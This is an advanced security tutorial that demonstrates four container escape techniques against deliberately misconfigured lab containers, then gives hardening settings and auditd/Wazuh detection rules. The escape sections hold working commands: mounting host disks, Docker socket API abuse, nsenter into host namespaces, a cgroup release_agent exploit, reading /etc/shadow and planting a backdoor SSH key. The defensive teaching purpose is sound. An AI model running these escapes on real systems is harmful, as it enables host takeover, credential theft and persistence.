Tutorial

Container Escape: Namespace and Privilege Breakouts

Exploit four container escape techniques — privileged mounts, Docker socket abuse, namespace escapes, and cgroup release_agent — then harden against each one.

14 min read advanced

Prerequisites

  • Familiarity with Linux namespaces and cgroups
  • Docker or Podman usage experience
  • Understanding of Linux syscalls and capabilities
  • Root access to a test machine or VM
Table of Contents

Containers are the dominant deployment unit in modern infrastructure, and the security model behind them is widely misunderstood. The abstraction is clean — an isolated filesystem, process tree, and network stack — but underneath, a container is a set of kernel features applied to a regular Linux process. There is no hypervisor. There is no hardware boundary. Every container escape exploits the fact that the host kernel is shared.

This tutorial demonstrates four container escape techniques against deliberately misconfigured containers, then shows how to harden against each one. The goal is to build an accurate mental model of what containers actually isolate, where the boundaries are thin, and what configurations break them entirely.

How containers isolate

A container is not a VM. A virtual machine runs its own kernel on emulated (or virtualized) hardware. A container runs as a process on the host kernel, with isolation enforced by four kernel subsystems working together.

        Virtual Machine                        Container

┌─────────────────────────┐       ┌─────────────────────────┐
│     Guest Userspace     │       │   Container Process     │
├─────────────────────────┤       │   (isolated view)       │
│     Guest Kernel        │       └────────────┬────────────┘
├─────────────────────────┤                    │
│     Hypervisor          │       ┌────────────┴────────────┐
├─────────────────────────┤       │   Namespaces            │
│     Host Kernel         │       │   Cgroups               │
├─────────────────────────┤       │   Seccomp               │
│     Host Hardware       │       │   Capabilities          │
└─────────────────────────┘       ├─────────────────────────┤
                                  │   Host Kernel (shared)  │
                                  ├─────────────────────────┤
                                  │   Host Hardware          │
                                  └─────────────────────────┘

Namespaces give each container its own view of system resources. Linux supports seven namespace types:

NamespaceIsolatesEffect
PIDProcess IDsContainer sees only its own processes, PID 1 is the entrypoint
NETNetwork stackContainer gets its own interfaces, routing table, iptables rules
MNTFilesystem mountsContainer sees only its own mount tree
UTSHostname and domainContainer can set its own hostname
IPCSystem V IPC, POSIX message queuesShared memory segments are isolated
USERUser and group IDsUID 0 inside can map to unprivileged UID on host
cgroupCgroup root viewContainer sees only its own cgroup hierarchy

Cgroups v2 limit resource consumption. They prevent a container from exhausting host CPU, memory, I/O, or PIDs. Cgroups do not provide security isolation — they are a denial-of-service prevention mechanism. However, the cgroup filesystem itself can become an escape vector, as we’ll see. Cgroup v1 had a flat hierarchy with separate controllers (cpu, memory, blkio, etc.) each mounted independently. Cgroup v2 uses a unified hierarchy, which simplifies management and — critically for this tutorial — removes the release_agent mechanism that enabled one of the escape techniques we’ll demonstrate.

Seccomp (Secure Computing Mode) filters syscalls at the kernel level. A seccomp filter is a BPF program attached to a process that intercepts every syscall before it enters the kernel. The default Docker/Podman seccomp profile blocks roughly 44 of the 300+ syscalls on x86_64, including dangerous ones like mount, reboot, kexec_load, ptrace, and bpf. Disabling seccomp (or running privileged) removes this filter entirely, exposing the full syscall surface to the container process.

Linux capabilities split root’s monolithic power into ~41 discrete permissions. Instead of a binary root/non-root check, the kernel evaluates specific capabilities for each privileged operation. CAP_NET_BIND_SERVICE allows binding to ports below 1024. CAP_SYS_ADMIN allows mounting filesystems, configuring namespaces, and dozens of other operations (it’s the “catch-all” capability and the most dangerous). A default container gets a reduced set — typically CAP_CHOWN, CAP_DAC_OVERRIDE, CAP_FOWNER, CAP_NET_BIND_SERVICE, and a handful of others. Running with --privileged grants all capabilities, disables seccomp, and gives device access, which is functionally equivalent to root on the host.

Insight

The shared kernel boundary Every escape in this tutorial exploits the same fundamental fact: the container and the host share a kernel. Namespaces control what a process can see. Capabilities and seccomp control what it can do. But if you grant enough capabilities or disable enough restrictions, the process can reach through those boundaries because the kernel doesn’t distinguish between “container root” and “host root” at the syscall level — it only checks capabilities.

Lab setup

This lab uses Podman to create deliberately vulnerable containers. Each container is configured with a specific misconfiguration that enables one escape technique.

Warning

Run this lab only in a disposable VM or test environment. These containers are intentionally misconfigured to allow full host compromise. Never run these configurations on production systems, shared machines, or any system with data you care about.

Create the lab setup script.

#!/bin/bash
# container-escape-lab.sh
# Starts four deliberately vulnerable containers for escape practice.
# ONLY run this in an isolated VM.

set -euo pipefail

LAB_NET="escape-lab"
IMAGE="docker.io/library/ubuntu:24.04"

echo "[*] Pulling base image..."
podman pull "$IMAGE"

echo "[*] Creating lab network..."
podman network create "$LAB_NET" 2>/dev/null || true

# Use a Docker-compatible API socket for Escape 2.
if [ -S /var/run/docker.sock ]; then
  API_SOCK=/var/run/docker.sock
elif [ -S /run/podman/podman.sock ]; then
  API_SOCK=/run/podman/podman.sock
elif [ -n "${XDG_RUNTIME_DIR:-}" ] && [ -S "${XDG_RUNTIME_DIR}/podman/podman.sock" ]; then
  API_SOCK="${XDG_RUNTIME_DIR}/podman/podman.sock"
else
  echo "[!] No Docker-compatible container API socket found."
  echo "[!] Start Docker, or enable Podman socket:"
  echo "    systemctl enable --now podman.socket"
  exit 1
fi
echo "[*] Using API socket: $API_SOCK"

echo "[*] Starting Escape 1: Privileged container"
podman run -d --name escape1-privileged \
  --privileged \
  --network "$LAB_NET" \
  "$IMAGE" sleep infinity

echo "[*] Starting Escape 2: Docker socket mount"
podman run -d --name escape2-socket \
  -v "$API_SOCK:/var/run/docker.sock" \
  --network "$LAB_NET" \
  "$IMAGE" sleep infinity

echo "[*] Starting Escape 3: Shared PID namespace"
podman run -d --name escape3-pidhost \
  --pid=host \
  --privileged \
  --network "$LAB_NET" \
  "$IMAGE" sleep infinity

echo "[*] Starting Escape 4: Writable cgroup (cgroup v1)"
podman run -d --name escape4-cgroup \
  --security-opt apparmor=unconfined \
  --security-opt seccomp=unconfined \
  --cap-add=SYS_ADMIN \
  --cgroupns=host \
  --network "$LAB_NET" \
  "$IMAGE" sleep infinity

echo ""
echo "[+] Lab containers running:"
podman ps --filter "network=$LAB_NET" --format "table {{.Names}}\t{{.Status}}"
echo ""
echo "[*] Enter a container with: podman exec -it <name> bash"
echo "[*] Tear down with:         podman rm -f escape1-privileged escape2-socket escape3-pidhost escape4-cgroup"

Install tools inside each container as needed.

# For each container, install basic utilities
for c in escape1-privileged escape2-socket escape3-pidhost escape4-cgroup; do
  podman exec "$c" apt-get update -qq
  podman exec "$c" apt-get install -y -qq curl util-linux iproute2 procps libcap2-bin python3 openssh-client > /dev/null
done

Tip

If your test VM uses cgroup v2 only (most modern distros), Escape 4 won’t work as written. To test the cgroup release_agent technique, boot the VM with systemd.unified_cgroup_hierarchy=0 on the kernel command line to enable the hybrid or legacy cgroup hierarchy.

Escape 1: Privileged container to host filesystem

The --privileged flag is the most dangerous container configuration. It grants all Linux capabilities, disables seccomp, mounts all host devices into the container’s /dev, and removes AppArmor/SELinux confinement. It exists for cases like running Docker-in-Docker or accessing hardware directly — but it completely destroys the container security boundary.

Identifying a privileged container

Enter the container and check your capabilities.

podman exec -it escape1-privileged bash

Inside the container, list the current capabilities.

capsh --print | grep "Current:"

A privileged container returns a full bitmask. You’ll see every capability listed, including dangerous ones like CAP_SYS_ADMIN, CAP_SYS_PTRACE, CAP_DAC_READ_SEARCH, and CAP_SYS_RAWIO.

Check for device access.

ls /dev/sda* /dev/vda* /dev/nvme* 2>/dev/null

In a normal container, /dev contains only a few virtual devices. In a privileged container, you’ll see the host’s actual block devices — the physical (or virtual) disks.

Mounting the host filesystem

Identify the host root partition. If your VM uses /dev/sda1 or /dev/vda1:

fdisk -l /dev/sda 2>/dev/null || fdisk -l /dev/vda 2>/dev/null

Mount the host root filesystem.

mkdir -p /mnt/host
mount /dev/sda1 /mnt/host

You now have full read-write access to the host’s filesystem from inside the container.

# Read the host's shadow file
cat /mnt/host/etc/shadow

# List host users with login shells
grep -v nologin /mnt/host/etc/passwd

# Read the host's SSH keys
ls -la /mnt/host/root/.ssh/
cat /mnt/host/root/.ssh/authorized_keys

Writing persistent access

Add an SSH key to the host’s authorized_keys.

# Generate a key pair inside the container
ssh-keygen -t ed25519 -f /tmp/backdoor -N ""

# Write the public key to the host's authorized_keys
mkdir -p /mnt/host/root/.ssh
cat /tmp/backdoor.pub >> /mnt/host/root/.ssh/authorized_keys
chmod 600 /mnt/host/root/.ssh/authorized_keys

Full escape with nsenter

With --privileged, you can also use nsenter to enter the host’s namespaces directly. PID 1 on the host is always init (or systemd).

nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash

This drops you into a shell that is, for all practical purposes, running directly on the host as root. You’ve left the container entirely.

# Verify you're on the host
hostname
cat /etc/os-release
ps aux | head -20

Insight

Why —privileged exists The --privileged flag was originally designed for running the Docker daemon inside a container (DinD) and for containers that need direct hardware access. In both cases, the container must operate with host-level privileges. The problem is that --privileged is often used as a shortcut for debugging permission issues, and it persists into production. Any container running with --privileged is not actually contained.

Escape 2: Docker socket mount

Mounting /var/run/docker.sock into a container is extremely common in CI/CD pipelines (Jenkins, GitLab CI), monitoring tools (cAdvisor, Datadog), and container management UIs (Portainer). The Docker socket is a Unix socket that provides full, unauthenticated access to the Docker API. Access to this socket is equivalent to root on the host.

The Docker API attack

Enter the container.

podman exec -it escape2-socket bash

Verify the socket is available.

ls -la /var/run/docker.sock

You don’t need the Docker CLI to exploit this. The Docker API speaks HTTP over the Unix socket, and curl can talk to Unix sockets directly.

List running containers via the API.

curl -s --unix-socket /var/run/docker.sock http://localhost/containers/json | \
  python3 -c "import sys,json; [print(c['Names'][0], c['Image']) for c in json.load(sys.stdin)]"

Creating an escape container

Create a new container via the API that mounts the host root filesystem.

# Create the container
curl -s --unix-socket /var/run/docker.sock \
  -X POST http://localhost/containers/create?name=escape-host \
  -H "Content-Type: application/json" \
  -d '{
    "Image": "ubuntu:24.04",
    "Cmd": ["/bin/bash"],
    "Tty": true,
    "OpenStdin": true,
    "HostConfig": {
      "Binds": ["/:/hostfs"],
      "Privileged": true
    }
  }'

# Start it
curl -s --unix-socket /var/run/docker.sock \
  -X POST http://localhost/containers/escape-host/start

Now attach to the new container — or more practically, use the exec endpoint to run commands.

# Execute a command in the escape container to read host files
# First, create the exec instance
EXEC_ID=$(curl -s --unix-socket /var/run/docker.sock \
  -X POST http://localhost/containers/escape-host/exec \
  -H "Content-Type: application/json" \
  -d '{"Cmd":["cat","/hostfs/etc/shadow"],"AttachStdout":true}' | \
  python3 -c "import sys,json; print(json.load(sys.stdin)['Id'])")

# Then start it
curl -s --unix-socket /var/run/docker.sock \
  -X POST "http://localhost/exec/${EXEC_ID}/start" \
  -H "Content-Type: application/json" \
  -d '{"Detach":false}'

This returns the contents of the host’s /etc/shadow, demonstrating full host filesystem access through a container that only had the Docker socket mounted.

The broader implication

The Docker socket grants the ability to:

  • Create privileged containers with host volume mounts
  • Execute arbitrary commands on the host via new containers
  • Read and write any file on the host filesystem
  • Modify running containers and images
  • Stop or remove other containers (denial of service)

Warning

“Read-only” Docker socket mounts (-v /var/run/docker.sock:/var/run/docker.sock:ro) do not help. The :ro flag prevents the container from deleting or replacing the socket file. It does nothing to restrict the API calls made through the socket. The API itself has no read-only mode.

Escape 3: Namespace escape via nsenter

When a container runs with --pid=host, the PID namespace isolation is removed. The container process can see every process on the host. Combined with sufficient capabilities (which --privileged provides), this allows direct entry into the host’s namespaces.

Seeing host processes

Enter the container.

podman exec -it escape3-pidhost bash

List processes. You’ll see the full host process tree, not just the container’s processes.

ps aux

You’ll see systemd (PID 1), kernel threads, SSH daemons, the container runtime, and everything else running on the host. In a properly namespaced container, ps aux would only show the container’s entrypoint process and its children.

Entering the host namespaces

Each process on Linux has a set of namespace references in /proc/<pid>/ns/. When you can see host PID 1, you can enter its namespaces.

ls -la /proc/1/ns/

Use nsenter to enter all of PID 1’s namespaces.

nsenter --target 1 --mount --uts --ipc --net --pid -- /bin/bash

Each flag enters a specific namespace of the target process:

FlagNamespaceEffect
--mountMNTSee the host’s filesystem mounts
--utsUTSSee the host’s hostname
--ipcIPCAccess the host’s shared memory
--netNETUse the host’s network stack
--pidPIDSee the host’s process tree

After nsenter, you’re operating in the host’s context. Verify it.

hostname
mount | head -10
ip addr
cat /etc/hostname

Why —pid=host is used

The --pid=host flag is typically used for debugging and monitoring containers — tools that need to observe host processes. It’s sometimes combined with --privileged for troubleshooting. The combination of both flags is functionally equivalent to running directly on the host.

Tip

If you only need process visibility for monitoring (e.g., running htop or a metrics exporter), consider using /proc from a mounted host path instead of sharing the PID namespace. This provides read-only visibility without enabling namespace traversal.

Escape 4: cgroup release_agent (CVE-2022-0492)

This escape is more subtle than the previous three. It doesn’t require --privileged or a mounted socket — just CAP_SYS_ADMIN and the ability to write to the cgroup filesystem. It exploits the release_agent mechanism in cgroup v1.

How cgroup release_agent works

In cgroup v1, each cgroup hierarchy has a release_agent file at its root. When a cgroup has notify_on_release set to 1 and the last process in that cgroup exits, the kernel executes the program specified in release_agent — and it executes it on the host, outside any container namespace.

┌─────────────────────────────────────────────┐
│  Container                                  │
│                                             │
│  1. Create child cgroup                     │
│  2. Set notify_on_release = 1               │
│  3. Write host path to release_agent        │
│  4. Put a process in the child cgroup       │
│  5. Kill the process (last one exits)       │
│                                             │
└──────────────────────┬──────────────────────┘
                       │ cgroup event

┌─────────────────────────────────────────────┐
│  Host Kernel                                │
│                                             │
│  Kernel executes release_agent script       │
│  → runs ON THE HOST, as root                │
│  → outside all container namespaces         │
│                                             │
└─────────────────────────────────────────────┘

Executing the escape

Enter the container.

podman exec -it escape4-cgroup bash

First, find the container’s location on the host filesystem. The container’s filesystem is visible from the host at a path we can discover through the cgroup mount.

# Find the cgroup mount point
mount | grep cgroup

Identify the cgroup path for this container and the writable hierarchy.

# Find a writable cgroup hierarchy
# In cgroup v1, RDMA or other hierarchies may be writable
CGROUP_MOUNT=$(mount | grep "cgroup " | head -1 | awk '{print $3}')
echo "Cgroup mount: $CGROUP_MOUNT"

Now determine the host path to the container’s filesystem. This is needed because the release_agent script will execute on the host, so it needs a path the host kernel can resolve.

# Get the host path to the container's filesystem
# This is available via /proc/1/mountinfo
HOST_PATH=$(sed -n 's/.*upperdir=\([^,]*\).*/\1/p' /proc/1/mountinfo | head -1)
if [ -z "$HOST_PATH" ]; then
  echo "Could not resolve host overlay path from /proc/1/mountinfo"
  exit 1
fi
echo "Host path: $HOST_PATH"

Create the exploit.

# Create the payload script in the container rootfs.
# The host sees it at $HOST_PATH/cmd.sh.
CONTAINER_SCRIPT="/cmd.sh"
CONTAINER_OUTPUT="/output_from_host"
HOST_SCRIPT="$HOST_PATH/cmd.sh"

cat > "$CONTAINER_SCRIPT" << 'INNEREOF'
#!/bin/sh
ps aux > /output_from_host
cat /etc/hostname >> /output_from_host
id >> /output_from_host
INNEREOF
chmod +x "$CONTAINER_SCRIPT"

# Create a child cgroup
mkdir -p "$CGROUP_MOUNT/escape"

# Set notify_on_release
echo 1 > "$CGROUP_MOUNT/escape/notify_on_release"

# Set the release_agent to our script (using the host-visible path)
echo "$HOST_SCRIPT" > "$CGROUP_MOUNT/release_agent"

# Trigger: put a process in the child cgroup, then let it exit
sh -c "echo \$\$ > $CGROUP_MOUNT/escape/cgroup.procs && sleep 0.1"

After the sh process exits, it’s the last process in the escape cgroup. The kernel invokes the release_agent on the host.

# Check the output (give it a moment)
sleep 1
cat "$CONTAINER_OUTPUT"

If successful, you’ll see the host’s process list, hostname, and uid=0(root) — proof that the script executed on the host as root.

Requirements and limitations

This escape requires a specific combination of conditions:

  • cgroup v1: The release_agent mechanism doesn’t exist in cgroup v2. Most modern distributions default to cgroup v2.
  • CAP_SYS_ADMIN: Needed to mount cgroup filesystems and write to release_agent.
  • Host cgroup namespace or writable cgroup: The container must be able to write to the cgroup hierarchy root, which requires --cgroupns=host or equivalent.
  • No AppArmor/SELinux: Mandatory access control policies can block writes to cgroup files.

CVE-2022-0492 addressed the specific kernel bug where unprivileged users within a user namespace could write to release_agent, but the underlying mechanism still works when CAP_SYS_ADMIN is explicitly granted.

Insight

The cgroup escape pattern This technique is notable because it uses a legitimate kernel feature as designed. The release_agent was intended for cleanup tasks when a cgroup becomes empty. The kernel correctly executes the specified program when the last process exits. The vulnerability isn’t a bug in the traditional sense — it’s a feature that was never designed with container isolation in mind, operating on a kernel subsystem that predates containers by years.

Secure container configuration

Each escape exploited a specific misconfiguration. Here’s the defense for each one, and at the end, a single hardened container command that applies all protections simultaneously.

Defense against Escape 1: Drop capabilities

Never use --privileged. Instead, drop all capabilities and add back only what the application needs.

podman run -d --name hardened-app \
  --cap-drop=ALL \
  --cap-add=NET_BIND_SERVICE \
  my-app:latest

The --cap-drop=ALL removes every capability. --cap-add selectively restores only what’s required. Most applications need at most two or three capabilities. If you don’t know which ones your application needs, run it with all capabilities dropped and add back whichever ones the error messages indicate are missing.

Defense against Escape 2: Never mount the Docker socket

There is no safe way to mount the Docker socket into a container. Any access to the socket is full API access.

For CI/CD pipelines that need to build container images, use alternatives:

  • Kaniko: Builds container images in userspace without a Docker daemon
  • Buildah: Builds OCI images without requiring a daemon socket
  • Podman: Daemonless container management; no socket to mount

For monitoring tools that need container metadata, use the read-only container API endpoints via a proxy that restricts which API calls are allowed.

Defense against Escape 3: Isolate PID namespace

Never use --pid=host in production. The default behavior (--pid=container) is correct for almost all workloads.

# Explicitly set (this is the default, but making it explicit prevents accidents)
podman run -d --pid=private my-app:latest

Defense against Escape 4: Restrict cgroup access

Don’t grant CAP_SYS_ADMIN unless absolutely necessary. Use cgroup v2 (which doesn’t have the release_agent mechanism). Keep containers in their own cgroup namespace.

# Ensure containers use their own cgroup namespace (default in modern Podman)
podman run -d --cgroupns=private my-app:latest

Defense in depth: The hardened run command

Apply all defenses simultaneously.

podman run -d --name production-app \
  --cap-drop=ALL \
  --cap-add=NET_BIND_SERVICE \
  --read-only \
  --tmpfs /tmp:rw,noexec,nosuid,size=64m \
  --security-opt=no-new-privileges \
  --security-opt seccomp=/etc/containers/seccomp.json \
  --pids-limit=256 \
  --memory=512m \
  --cpus=1 \
  --pid=private \
  --cgroupns=private \
  --network=slirp4netns \
  --user 1000:1000 \
  my-app:latest

Breaking this down:

FlagDefense
--cap-drop=ALL --cap-add=NET_BIND_SERVICEMinimal capabilities
--read-onlyImmutable rootfs prevents writing exploit scripts
--tmpfs /tmp:rw,noexec,nosuid,size=64mWritable temp with noexec, so scripts can’t be executed from /tmp
--security-opt=no-new-privilegesPrevents suid binaries from gaining privileges
--security-opt seccomp=...Custom seccomp profile blocks dangerous syscalls
--pids-limit=256Prevents fork bombs
--memory=512m --cpus=1Resource limits prevent host starvation
--pid=privateOwn PID namespace
--cgroupns=privateOwn cgroup namespace
--network=slirp4netnsRootless networking (no CAP_NET_ADMIN needed)
--user 1000:1000Non-root user inside the container

Tip

Rootless Podman as a baseline Running Podman rootless (as a non-root user) applies user namespace mapping automatically. Root inside the container maps to your unprivileged UID on the host. Even if an attacker escapes the container, they land as an unprivileged user. This single change mitigates the majority of container escape techniques because most escapes require true host root privileges to be useful.

Seccomp profile hardening

The default seccomp profile is a good start, but you can tighten it further. Generate a profile specific to your application by tracing its syscalls, then locking down the allowlist.

# Trace syscalls your application uses during a test run
podman run --rm --security-opt seccomp=unconfined \
  --annotation io.containers.trace-syscall="of:/tmp/seccomp-profile.json" \
  my-app:latest /run-test-suite.sh

# Use the generated profile
podman run -d \
  --security-opt seccomp=/tmp/seccomp-profile.json \
  my-app:latest

This produces a minimal seccomp profile that allows only the syscalls your application actually uses during testing.

Detection

Hardening prevents escapes, but defense in depth requires detection as well. The following rules cover auditd (host-level syscall auditing) and Wazuh (SIEM correlation and alerting) for each escape vector.

Detecting mount syscalls from containers

Escape 1 uses mount to attach host block devices. Container processes should almost never call mount.

Auditd rule:

# /etc/audit/rules.d/container-mount.rules
# Watch for mount syscalls from processes in non-root mount namespaces
-a always,exit -F arch=b64 -S mount -S umount2 -F auid>=1000 -F key=container_mount
-a always,exit -F arch=b64 -S mount -S umount2 -F exe=/usr/bin/nsenter -F key=container_mount

Wazuh rule to alert on the auditd events:

<group name="container_escape,">
  <rule id="100410" level="12">
    <if_sid>80700</if_sid>
    <field name="audit.key">container_mount</field>
    <description>Mount syscall detected from container context — possible container escape attempt.</description>
    <mitre>
      <id>T1611</id>
    </mitre>
    <group>container_escape,privilege_escalation,</group>
  </rule>
</group>

Detecting Docker socket access

Escape 2 communicates with the Docker socket from inside a container. Monitor access to the socket.

Auditd rule:

# /etc/audit/rules.d/docker-socket.rules
# Watch for access to the Docker socket
-w /var/run/docker.sock -p rwa -k docker_socket_access

Wazuh rule:

<group name="container_escape,">
  <rule id="100411" level="10">
    <if_sid>80700</if_sid>
    <field name="audit.key">docker_socket_access</field>
    <description>Docker socket accessed — check if source process is authorized.</description>
    <mitre>
      <id>T1611</id>
    </mitre>
    <group>container_escape,</group>
  </rule>

  <!-- Higher severity when curl or wget accesses the socket -->
  <rule id="100412" level="14">
    <if_sid>100411</if_sid>
    <field name="audit.exe">(curl|wget|python)</field>
    <description>Docker socket accessed by unusual process — likely container escape via API abuse.</description>
    <mitre>
      <id>T1611</id>
    </mitre>
    <group>container_escape,privilege_escalation,</group>
  </rule>
</group>

Detecting nsenter usage

Escapes 1 and 3 use nsenter to cross namespace boundaries. This binary should rarely be executed in production.

Auditd rule:

# /etc/audit/rules.d/nsenter.rules
# Watch for nsenter execution
-w /usr/bin/nsenter -p x -k nsenter_execution

Wazuh rule:

<group name="container_escape,">
  <rule id="100413" level="13">
    <if_sid>80700</if_sid>
    <field name="audit.key">nsenter_execution</field>
    <description>nsenter executed — possible namespace escape from container.</description>
    <mitre>
      <id>T1611</id>
    </mitre>
    <group>container_escape,privilege_escalation,</group>
  </rule>
</group>

Detecting cgroup release_agent modification

Escape 4 writes to the release_agent file. This file should never be modified by container processes.

Auditd rule:

# /etc/audit/rules.d/cgroup-release-agent.rules
# Watch for writes to any release_agent file in cgroup hierarchies
-w /sys/fs/cgroup/ -p wa -k cgroup_modification

Wazuh rule:

<group name="container_escape,">
  <rule id="100414" level="14">
    <if_sid>80700</if_sid>
    <field name="audit.key">cgroup_modification</field>
    <match>release_agent</match>
    <description>cgroup release_agent modified — possible CVE-2022-0492 container escape.</description>
    <mitre>
      <id>T1611</id>
    </mitre>
    <group>container_escape,privilege_escalation,</group>
  </rule>

  <rule id="100415" level="12">
    <if_sid>80700</if_sid>
    <field name="audit.key">cgroup_modification</field>
    <match>notify_on_release</match>
    <description>cgroup notify_on_release modified — possible setup for cgroup escape.</description>
    <mitre>
      <id>T1611</id>
    </mitre>
    <group>container_escape,</group>
  </rule>
</group>

Centralized alert dashboard

With these rules deployed, Wazuh will generate alerts at levels 10-14 for container escape activity. A practical alert strategy:

Alert LevelEscape VectorResponse
14Docker socket + unusual processImmediate investigation
14cgroup release_agent writeImmediate investigation
13nsenter executionInvestigate within 15 minutes
12Mount syscall from containerInvestigate within 1 hour
10Docker socket accessReview daily

Tip

Reduce noise with context The auditd rules above will generate events for legitimate container operations too (e.g., the container runtime itself calls mount). To reduce false positives, add -F exe!=/usr/bin/runc and similar exclusions for your container runtime. The Wazuh rules can use <if_sid> chains to require multiple suspicious behaviors before alerting at high severity.

Where to go from here

This tutorial covered four escape techniques against specific misconfigurations. The container escape landscape is broader than this — other vectors include kernel exploits (CVE-2022-0847 Dirty Pipe, CVE-2016-5195 Dirty COW), container runtime vulnerabilities (CVE-2019-5736 allowed overwriting the host runc binary from within a container), image supply chain attacks (malicious base images, compromised registries), and cloud metadata service abuse from within containers (SSRF to 169.254.169.254 to steal IAM credentials). Each of those deserves its own treatment.

For production environments, consider these additional layers beyond what this tutorial covered:

  • gVisor or Kata Containers: These provide a stronger isolation boundary. gVisor intercepts syscalls with a user-space kernel, reducing the host kernel’s attack surface. Kata Containers run each container in a lightweight VM, providing hardware-level isolation while maintaining container ergonomics.
  • Pod Security Standards: Kubernetes provides three built-in policy levels (Privileged, Baseline, Restricted) that enforce many of the hardening measures covered here at the cluster level, preventing misconfigured containers from being deployed in the first place.
  • Runtime security tools: Falco, Tracee, and Tetragon can detect escape attempts in real time by monitoring syscalls, file access patterns, and network activity from eBPF hooks, providing deeper visibility than auditd alone.

The key takeaway is structural: containers provide process-level isolation, not machine-level isolation. Every configuration flag you set either strengthens or weakens that boundary. Start from the hardened baseline, grant only what’s necessary, monitor for the specific syscalls and file accesses that indicate boundary violations, and treat any container with --privileged or a mounted Docker socket as equivalent to root on the host — because it is.